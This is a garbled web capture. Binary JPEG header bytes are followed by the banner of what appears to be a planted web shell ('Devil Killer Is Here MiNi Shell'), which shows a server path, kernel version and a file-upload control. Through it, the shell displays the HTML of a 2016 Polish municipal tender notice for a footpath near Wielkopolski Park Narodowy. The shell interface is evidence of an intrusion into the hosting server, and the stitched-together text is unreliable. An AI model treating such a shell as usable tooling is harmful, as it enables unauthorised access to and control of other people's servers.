JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160223/39478-N-2016.html

<p class="kh_header"><b>Stęszew: Budowa ścieżki pieszej na odcinku Dębienko - Wielkopolski Park Narodowy z materiału Wykonawcy</b><br>
<b>Numer ogłoszenia: 39478 - 2016; data zamieszczenia: 23.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stęszew , ul. Poznańska 11, 62-060 Stęszew, woj. wielkopolskie, tel. 8197141.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.steszew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ścieżki pieszej na odcinku Dębienko - Wielkopolski Park Narodowy z materiału Wykonawcy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest:

    Budowa ścieżki pieszej na odcinku Dębienko - Wielkopolski Park Narodowy z materiału
    Wykonawcy.

2. Zakres prac obejmuje roboty budowlano montażowe polegające na:

1	ROBOTY PRZYGOTOWAWCZE	 	 
1.1	Roboty pomiarowe przy liniowych robotach ziemnych.	km	0,26
1.2	Ścinanie drzew piłą mechaniczną śr. 10-15 cm	szt.	3,00
1.3	Karczowanie pni śr. 10-15 cm	szt.	3,00
1.4	Ścinanie drzew piłą mechaniczną śr. 16-25 cm	szt.	19,00
1.5	Karczowanie pni śr. 16-25 cm	szt.	19,00
1.6	Ścinanie śr. 26-35 cm	szt.	13,00
1.7	Karczowanie pni śr. 26-35 cm	szt.	13,00
1.8	Ścinanie drzew śr. 45 cm	szt.	4,00
1.9	Karczowanie pni śr. 36-45 cm	szt.	4,00
1.10	Wywożenie dłużyc	m-p	25,20
1.11	Wywożenie karpiny	m-p	15,00
1.12	Wywożenie gałęzi	m-p	40,00
1.13	Przestawienie bram	szt.	1,00
2	ROBOTY ZIEMNE	 	 
2.1	Usunięcie warstwy ziemi urodzajnej (humusu) gr. do 30 cm	m2	920,00
2.2	Usunięcie warstwy ziemi urodzajnej (humusu) gr. do 50 cm	m2	318,00
2.3	Usunięcie warstwy ziemi urodzajnej (humusu) gr. do 100 cm	m2	608,00
2.4	Roboty ziemne z wywozem gruntu	m3	311,00
2.5	Formowanie i zagęszczanie nasypów (wraz z zakupem gruntu)	m3	1 650,00
2.6	Plantowanie powierzchni skarp i korony nasypów	m2	726,00
2.7	Roboty ziemne z wywozem gruntu	m3	 57,000
3	PODBUDOWY	 	 
3.1	Koryta wykonywane mechanicznie głęb. 13 cm	m2	910,00
3.2	Koryta wykonywane mechanicznie głęb. 28 cm	m2	113,00
3.3	Roboty ziemne z wywozem gruntu	m3	31,64
3.4	Warstwa podbudowy z kruszywa łamanego, gr. 15 cm (0/31,5)	m2	313,00
4	ELEMENTY ULIC	 	 
4.1	Ławy betonowe pod krawężniki zwykłe	m3	3,200
4.2	Krawężniki betonowe wtopione o wymiarach 10x25 cm	m	80,00
4.3	Ławy betonowe z oporem pod krawężniki	m3	15,80
4.4	Obrzeża betonowe o wymiarach 30x8 cm	m	545,00
5	NAWIERZCHNIE	 	 
5.1	Chodniki z kostki brukowej betonowej gr. 8 cm, szarej	m2	627,00
5.2	Wjazdy z kostki brukowej betonowej gr. 8 cm, kolorowej (grafit)	m2	113,00
6	PRZEPUST	 	 
6.1	Przepust z rur o śr. 150 cm (z blachy stal. ocynk. spiralnie karb.) 	m	11,00
6.2	Ławy fundamentowe żwirowe (gr. 30 cm Is>0,98)	m3	11,06
6.3	Ławy fundamentowe (wykonanie podbudowy z tłucznia gr. 40 cm)	m3	11,17
6.4	Zasypywanie wykopów - współczynnik zagęszczenia Js=1,02	m3	115,45
6.5	Zasypywanie wykopów - współczynnik zagęszczenia Js=0,98	m3	115,45
6.6	Montaż złączek przepustu rurowego	szt.	1,00
6.7	Wykonanie warstwy separacyjnej z geotkaniny	m2	95,00
6.8	Wykonanie pierścienia z betonu C25/30	m3	0,80
6.9	Brukowanie skarp przekopów i nasypów kostką brukową	m2	20,00
6.10	Wykonanie narzutu kamiennego	m3	1,20
7	OZNAKOWANIE DRÓG I URZĄDZENIA BEZPIECZEŃSTWA RUCHU	 	 
7.1	Poręcze ochronne - U-11a (balustrada - materiał inwestora)	m	80,00
7.2	Pionowe znaki drogowe wraz z słupkami	kpl. 	   2,00
8	ROBOTY WYKOŃCZENIOWE	 	 
8.1	Humusowanie skarp z obsianiem	m2	726,00
8.2	Umocnienie rowów korytkami żelbetowymi.	m	95,00
8.3	Umocnienie skarp płytami chodnikowymi 35x35x5 cm	m2	205,00
8.4	Ogrodzenie z siatki na słupkach z rur ocynkowanych. 	m	8,00
8.5	Ogrodzenia z siatki leśnej na słupkach z rur ocynkowanych.	m2	192,00
8.6	Rozścielenie ziemi urodzajnej	m3	532,00
8.7	Wykonanie trawników	m2	760,00
8.8	Wykonanie inwentaryzacji powykonawczej	kpl.	1,00

Pozostałe prace zgodnie z dokumentacją przetargową.
Wykonawca wykona wszelkie niezbędne prace dla prawidłowego wykonania przedmiotu zamówienia. 

Ponadto zakres prac obejmuje:
Sporządzenie operatu kolaudacyjnego - 3 egzemplarze, na który składa się:
  1) dokumentacja powykonawcza
  2) obsługa geodezyjna zadania wraz z inwentaryzacją  powykonawczą -  mapy  kpl. 5,000
  3) atesty na materiały i prefabrykaty,
  4) protokóły odbioru robót.
  5) wymagane dokumenty dotyczące przeprowadzonych przez Wykonawcę badań i sprawdzeń.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.60-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane
1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium 
      w  wysokości:  (słownie: 
  2. Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
 1)  pieniądzu,
       2)  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, 
            z tym  że poręczenie kasy jest zawsze poręczeniem pieniężnym,
 3)  gwarancjach bankowych,
 4)  gwarancjach ubezpieczeniowych,
 5)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 
      9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
      (Dz. U.  Nr 109 poz. 1158 z późn. zmianami )).
  3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
  4. Wadium wnoszone w pieniądzu Wykonawca wpłaca na rachunek bankowy Urzędu Miejskiego 
      Gminy Stęszew na konto wskazane przez Zamawiającego.
      NR 10 9048 0007 0027  3550 6000 0004 GBS Mosina O/Stęszew
  5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty 
   zostaje termin uznania kwoty na rachunku Zamawiającego.
  6. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
  7. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego 
   wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego,
      Urząd Miejski Gminy Stęszew , ul. Poznańska 11 - pok. 3, lub dołączyć do oferty.
  8. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie 
  Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy.
  9. Zamawiający zwraca wadium zgodnie z art. 46 ustawy Prawo zamówień  publicznych.
10. Wadium wniesione w pieniądzu Zamawiający zwraca przelewem na wskazany przez Wykonawcę 
   rachunek bankowy.
11. Zamawiający zatrzymuje wadium, jeżeli Wykonawca, którego oferta została wybrana:
1)  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
     w ofercie
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 
           leżących po stronie Wykonawcy,
12. Zamawiający zatrzymuje wadium  wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie,
      o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub
      oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej
       grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 , lub informacji o tym, że nie należy do grupy
       kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co
       powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonych 
przez Wykonawcę oświadczeń i dokumentów.
Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca spełnia wymagane warunki.
Na dowód spełnienia niniejszego warunku Wykonawca zobowiązany jest przedstawić oświadczenie
Z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych ( zał. nr 2 do SIWZ ).
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty, wymaganych przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę  dokumentów.
Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca spełnia wymagane warunki.
Na dowód spełniania niniejszego warunku Wykonawca zobowiązany jest przedstawić w wykazie robót budowlanych wykonanie co najmniej jednej roboty budowlanej dotyczącej budowy, przebudowy, remontu chodnika lub placu z kostki brukowej  ( zał. nr 4 do SIWZ ).
     Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o informacje zawarte w dokumentach dołączonych do oferty, wymaganych przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonych 
przez Wykonawcę oświadczeń i dokumentów.
Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca spełnia wymagane warunki.
Na dowód spełnienia niniejszego warunku Wykonawca zobowiązany jest przedstawić oświadczenie
z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych ( zał. nr 2 i 5 do SIWZ ).
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty, wymaganych przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonych 
przez Wykonawcę oświadczeń i dokumentów.
Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca spełnia wymagane warunki.
Na dowód spełnienia niniejszego warunku Wykonawca zobowiązany jest przedstawić oświadczenie
Z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych ( zał. nr 2 do SIWZ ).
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty, wymaganych przez Zamawiającego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Na dowód spełniania niniejszego warunku Wykonawca zobowiązany jest przedstawić w wykazie robót budowlanych wykonanie co najmniej jednej roboty budowlanej dotyczącej budowy, przebudowy, remontu chodnika lub placu z kostki brukowej;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych 
    do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów,
    niezależnie od charakteru prawnego łączących go z nimi stosunków.
    Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował 
    tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne 
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby
    wykonania zamówienia.
    Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarne z wykonawcą za szkodę
    Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie
    zasobów nie ponosi winy.    Zobowiązanie musi być załączone do oferty</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Formularz oferty z oferowaną ceną netto i brutto wraz z kosztorysem ofertowym.
     Uwaga: Zaleca się wykorzystanie przekazanego formularza oferty. 
     Dopuszcza się formularz oferty przygotowany przez Wykonawcę pod warunkiem,  że będzie 
     on zgodny co do treści z formularzem określonym przez Zamawiającego.
     Dołączenie do oferty formularza o innej treści niż określony w SIWZ oraz niewypełnienie   
     wszystkich pozycji formularza ofertowego skutkować może odrzuceniem oferty.
2.  Oświadczenie, że Wykonawca spełnia warunki zawarte w art. 22 ust. 1 ustawy Prawo zamówień 
     publicznych.
3.  Wykonawca musi pisemnie wskazać w ofercie części zamówienia, której wykonanie powierzy 
     podwykonawcom.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Najdłuższy okres gwarancji - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Terminy wykonania zadania przedłuża się: 
1)	niesprzyjające warunki atmosferyczne nie pozwalające na realizację robót dla których określona odpowiednimi normami technologia wymaga właściwych warunków atmosferycznych, 
2)	gdy przeszkoda spowodowana jest przez siłę wyższą,
3)	napotkanie i uszkodzenie w czasie wykonywania robót na niezinwentaryzowane urządzenia 
podziemne,
4)	konieczność wykonania robót dodatkowych związanych z napotkaniem nieprzewidzianych 
przeszkód,
5)	napotkanie na niezewidencjonowane obiekty archeologiczne,
6)	wstrzymanie robót przez Konserwatora Zabytków,
7)	konieczność usunięcia błędów i braków w dokumentacji projektowej lub w dokumentacji technicznej urządzeń,
8)	udzielenie w trakcie realizacji umowy zamówień dodatkowych mających wpływ na uzgodniony termin realizacji umowy,
9)	wystąpienia okoliczności, których strony nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
    Przedłużenie terminu wykonania robót nastąpi o tyle dni, ile trwała przeszkoda w ich wykonaniu bez 
    możliwości ubiegania się o odszkodowanie przez Wykonawcę. 
    Podstawą do przesunięcia terminu jest wniosek Wykonawcy o przedłużenie terminu realizacji zadania, 
    zatwierdzony przez  Zamawiającego
2. Zmiana i wprowadzenie dodatkowych Podwykonawców:
1)	których udział w realizacji przedmiotu umowy zaakceptował Zamawiający.
2)	wprowadzenie dodatkowych Podwykonawców 
    Wykonawca może wprowadzić Podwykonawcę na teren budowy/robót po spełnieniu warunku 
    uzyskania akceptacji  Zamawiającego.  
3. Istnieje możliwość dokonania zmiany osób przewidzianych do realizacji zamówienia wskazanych przez 
    Wykonawcę na osoby o kwalifikacjach nie mniejszych niż te wymagane w SIWZ.
    Wykonawca ma obowiązek powiadomienia Zamawiającego o planowanej zmianie, nie później  
    niż 7 dni kalendarzowych przed planowaną datą jej dokonania. 
4.  Wynagrodzenie Wykonawcy może ulec zmianom w przypadku:
1)	rezygnacji z części prac, jeżeli rezygnacja będzie niezbędna dla prawidłowej realizacji przedmiotu umowy,
2)	gdy nieuzasadnione będzie wykonanie niektórych robót lub wykonanie tych robót okaże się zbędne w przyjętej technologii,
3)	zamiany materiałów pod warunkiem, że będą one korzystne dla Zamawiającego.  
4)	Wprowadzenie robót zamiennych.
